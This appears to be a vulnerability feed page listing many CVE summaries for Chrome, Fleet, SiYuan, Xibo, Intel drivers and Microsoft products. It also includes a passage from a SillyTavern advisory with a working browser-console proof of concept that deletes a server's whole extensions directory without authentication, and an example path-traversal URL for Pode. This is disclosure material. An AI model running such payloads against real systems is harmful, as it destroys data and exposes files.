Microsoft

Out-of-bounds memory write in Google Chrome's ANGLE graphics library (Windows only) enables attackers who have already compromised the renderer process to corrupt memory via specially crafted HTML pages. Chrome 148.0.7778.168 patches this type confusion vulnerability. Despite high Chromium severity rating, CVSS 3.1 scores only 3.1 due to prerequisite renderer compromise, high attack complexity, and required user interaction. EPSS 0.03% (10th percentile) and SSVC indicating no known exploitation suggest limited real-world risk at time of analysis.

Insufficient policy enforcement in Passwords in Google Chrome on Windows prior to 148.0.7778.168 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: High)

Out of bounds read in GPU in Google Chrome on Mac and Windows prior to 148.0.7778.168 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High)

Use after free in Core in Google Chrome on Windows prior to 148.0.7778.168 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Heap buffer overflow in WebML in Google Chrome on Windows prior to 148.0.7778.168 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Use after free in Network in Google Chrome on Windows prior to 148.0.7778.168 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Integer overflow in ANGLE in Google Chrome on Windows prior to 148.0.7778.168 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)

Integer overflow in Skia in Google Chrome on Windows prior to 148.0.7778.168 allowed a remote attacker who had compromised the renderer process to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)

Path traversal in Pode PowerShell web framework versions 2.4.0 through 2.12.x allows high-privileged authenticated users to read arbitrary files from the server filesystem via crafted static route requests. An attacker with high privilege can request paths like http://localhost:8080/c:/Windows/System32/drivers/etc/hosts to retrieve sensitive file contents. The vulnerability is fixed in version 2.13.0.

Stored cross-site scripting in SiYuan's Bazaar marketplace (versions 2.1.12 through 3.6.x) enables arbitrary code execution on the host system. The vulnerability stems from unescaped package author metadata rendering, which when exploited through a malicious marketplace package, allows attackers to leverage SiYuan's insecure Electron configuration (nodeIntegration enabled, contextIsolation disabled) to execute Node.js APIs and OS-level commands. No public exploit or active exploitation confirmed at time of analysis. CVSS 8.3 with high attack complexity and required user interaction suggests real-world exploitation depends on convincing users to view crafted marketplace entries.

Microsoft Authenticator on Android and iOS leaks sensitive information to unauthenticated remote attackers through network-based exploitation requiring user interaction. The scope change (S:C) in the CVSS vector indicates the vulnerability can affect resources beyond the vulnerable component, suggesting potential cross-account or session data exposure. Microsoft has released a patch addressing this exposure. EPSS data not available, not listed in CISA KEV, indicating no confirmed widespread exploitation at time of analysis.

Cross-site scripting (XSS) in Microsoft Exchange Server enables remote attackers to spoof content and steal credentials without authentication. Affects Exchange Server 2016 CU23, 2019 CU14/CU15, and Subscription Edition. Functional exploit code exists (CVSS temporal E:F) though no active exploitation confirmed at analysis time. CVSS 8.1 (High) driven by network vector, no authentication requirement, and dual confidentiality/integrity impact. Microsoft released patches via MSRC security update guide. Medium-high priority for organizations running affected Exchange versions with webmail or OWA exposed.

OS command injection in Fleet's software installer pipeline allows arbitrary code execution as root (macOS/Linux) or SYSTEM (Windows) on managed endpoints when a specially crafted software package is uninstalled. The vulnerability exists because package metadata fields are not sanitized before being incorporated into auto-generated uninstall scripts. An attacker with the ability to upload packages to Fleet can exploit this by embedding malicious commands in package metadata fields, resulting in code execution with elevated privileges when endpoints execute the uninstall operation. Patch version 4.81.1 available.

JWT authentication bypass in Fleet's Windows MDM enrollment allows attackers with access to any Azure AD tenant to enroll unauthorized devices and access management APIs. Fleet validates JWT signatures using Microsoft's multi-tenant JWKS endpoint but fails to verify 'aud' (audience) or 'iss' (issuer) claims, accepting any Microsoft-signed token with the expected scopes. This enables unauthorized device enrollment and potential exposure of enrollment secrets embedded in MDM payloads. Vendor-released patch available in Fleet v4.82.0 (March 2026). No evidence of active exploitation (not in CISA KEV) at time of analysis, though the vulnerability was responsibly disclosed by security researcher @zaddy6.

Client certificate validation bypass in Fleet's Windows MDM management endpoint allows remote attackers to impersonate enrolled devices and exfiltrate sensitive configuration data. With high attack complexity (CVSS:4.0 AV:N/AC:H), attackers possessing a valid device identifier can retrieve MDM payloads containing Wi-Fi credentials, VPN configurations, certificates, and other secrets. Vendor-released patch (Fleet v4.81.0) available. No public exploit or CISA KEV listing identified at time of analysis, though CVSS 8.2 severity reflects potential for credential theft and lateral movement.

In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Set/clear CR8 write interception when AVIC is (de)activated Explicitly set/clear CR8 write interception when AVIC is (de)activated to fix a bug where KVM leaves the interception enabled after AVIC is activated. E.g. if KVM emulates INIT=>WFS while AVIC is deactivated, CR8 will remain intercepted in perpetuity. On its own, the dangling CR8 intercept is "just" a performance issue, but combined with the TPR sync bug fixed by commit d02e48830e3f ("KVM: SVM: Sync TPR from LAPIC into VMCB::V_TPR even if AVIC is active"), the danging intercept is fatal to Windows guests as the TPR seen by hardware gets wildly out of sync with reality. Note, VMX isn't affected by the bug as TPR_THRESHOLD is explicitly ignored when Virtual Interrupt Delivery is enabled, i.e. when APICv is active in KVM's world. I.e. there's no need to trigger update_cr8_intercept(), this is firmly an SVM implementation flaw/detail. WARN if KVM gets a CR8 write #VMEXIT while AVIC is active, as KVM should never enter the guest with AVIC enabled and CR8 writes intercepted. [Squash fix to avic_deactivate_vmcb. - Paolo]

DLL hijacking in Bytello Share (Windows Edition) installer prior to version 5.13.0.4246 allows local attackers to execute arbitrary code with the privileges of the installing user. The installer insecurely loads DLLs from its current directory, enabling attackers who can place a malicious DLL in the same location to achieve code execution when a user runs the installer. EPSS probability is very low (0.01%, 3rd percentile) with no active exploitation identified, suggesting this requires significant local access prerequisites that limit real-world risk despite the high CVSS score.

{ return response.status(400).send('Bad Request'); } // [2] sanitize(".") → "" const extensionPath = path.join(basePath, sanitize(extensionName)); // path.join("data\\default-user\\extensions", "") // = "data\\default-user\\extensions" ← basePath itself! // [3] Deletes the entire extensions directory await fs.promises.rm(extensionPath, { recursive: true }); ``` `sanitize-filename` converts `"."` to `""` (documented behavior). `path.join(basePath, "")` returns `basePath` itself. Result: the entire `data\default-user\extensions\` directory is deleted. Tested on: Windows 10, SillyTavern v1.17.0, commit `004f1336e` Authentication: none (basicAuthMode: false, default configuration) Run in browser console (F12) while SillyTavern is open: ```javascript async function poc() { const { token } = await (await fetch('/csrf-token')).json(); const headers = { 'Content-Type': 'application/json', 'X-CSRF-Token': token, }; // Before: 1 extension installed const before = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('Before:', before.filter(e => e.type === 'local')); // [{ type: 'local', name: 'third-party/Extension-Notebook' }] // Attack const res = await fetch('/api/extensions/delete', { method: 'POST', headers, body: JSON.stringify({ extensionName: '.' }), }); console.log('Status:', res.status); // 200 console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions" // After: empty const after = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('After:', after.filter(e => e.type === 'local')); // [] } poc(); ``` **Result:** Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }] Status: 200 Body: Extension has been deleted at data\default-user\extensions After: [] - **No authentication required** (`basicAuthMode: false` by default). Any user with network access to the SillyTavern instance can permanently delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost. - With `global: true` and admin privileges, the global extensions directory shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to enable unauthenticated remote exploitation from a malicious website. The same vulnerability exists in: - `POST /api/extensions/update` - `POST /api/extensions/version` - `POST /api/extensions/branches` - `POST /api/extensions/switch` ```javascript const sanitized = sanitize(extensionName); // Check AFTER sanitizing if (!sanitized) { return response.status(400).send('Bad Request: Invalid extension name.'); } const extensionPath = path.join(basePath, sanitized); // Additional path traversal guard const resolvedPath = path.resolve(extensionPath); const resolvedBase = path.resolve(basePath); if (!resolvedPath.startsWith(resolvedBase + path.sep)) { return response.status(400).send('Bad Request: Invalid extension path.'); } ``` Apply the same fix to `/update`, `/version`, `/branches`, and `/switch` endpoints. - CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical) - sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename - Related CVE (same project): CVE-2025-59159 ##REPORTED BY Jormungandr

Improper input validation for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Out-of-bounds write for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow a escalation of privilege. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1.

linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + "/*", i.e. "https://login.microsoftonline.com/*". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: ["https://*/*"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1.

Improper privilege management in Microsoft Dynamics 365 Customer Insights allows an authorized attacker to elevate privileges over a network.

Improper neutralization of special elements in output used by a downstream component ('injection') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to elevate privileges over a network.

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Execution with unnecessary privileges in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Improper access control in Microsoft Office allows an unauthorized attacker to perform spoofing locally.

Untrusted search path in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.

Improper access control in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.

Incorrect implementation of authentication algorithm in Microsoft SSO Plugin for Jira & Confluence allows an unauthorized attacker to elevate privileges over a network.

Improper access control in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally.

Reliance on a component that is not updateable in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.

Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Improper access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Insufficient granularity of access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Use after free in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network.

Heap-based buffer overflow in Windows Win32K - GRFX allows an authorized attacker to execute code locally.

Use after free in Windows Hyper-V allows an unauthorized attacker to elevate privileges locally.

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service locally.

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

Improper access control in Windows Filtering Platform (WFP) allows an authorized attacker to bypass a security feature locally.

Integer underflow (wrap or wraparound) in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Untrusted pointer dereference in Windows Kernel allows an authorized attacker to elevate privileges locally.

Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Insufficient granularity of access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Double free in Windows Link-Layer Discovery Protocol (LLDP) allows an authorized attacker to elevate privileges locally.

Use after free in Windows Projected File System allows an authorized attacker to elevate privileges locally.

Null pointer dereference in Windows LDAP - Lightweight Directory Access Protocol allows an authorized attacker to deny service locally.

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

Buffer over-read in Windows DWM Core Library allows an authorized attacker to disclose information locally.

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to execute code over a network.

Double free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.

Heap-based buffer overflow in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Integer overflow or wraparound in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an unauthorized attacker to perform spoofing over a network.

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

External control of file name or path in Microsoft Edge (Chromium-based) allows an unauthorized attacker to disclose information over a network.

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

Files or directories accessible to external parties in Microsoft Teams allows an unauthorized attacker to perform spoofing locally.

Double free in Windows Rich Text Edit Control allows an authorized attacker to elevate privileges locally.

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.

Improper access control in Microsoft Office PowerPoint allows an authorized attacker to perform spoofing locally.

Improper access control in Microsoft Office Word allows an authorized attacker to perform spoofing locally.

Heap-based buffer overflow in Microsoft Windows DNS allows an unauthorized attacker to execute code over a network.

Improper control of generation of code ('code injection') in Microsoft Data Formulator allows an unauthorized attacker to execute code over a network.

Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.

External control of file name or path in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

External control of file name or path in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.

Use after free in Microsoft Office allows an authorized attacker to elevate privileges locally.

Use after free in Windows TCP/IP allows an unauthorized attacker to execute code over a network.

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network.

Use after free in Windows SMB Client allows an authorized attacker to elevate privileges locally.

Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally.

Heap-based buffer overflow in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

Use after free in Windows TCP/IP allows an unauthorized attacker to disclose information over a network.